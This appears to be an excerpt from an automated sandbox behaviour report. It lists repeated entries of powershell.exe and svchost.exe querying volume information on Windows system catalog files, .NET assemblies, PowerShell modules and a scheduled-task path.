                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
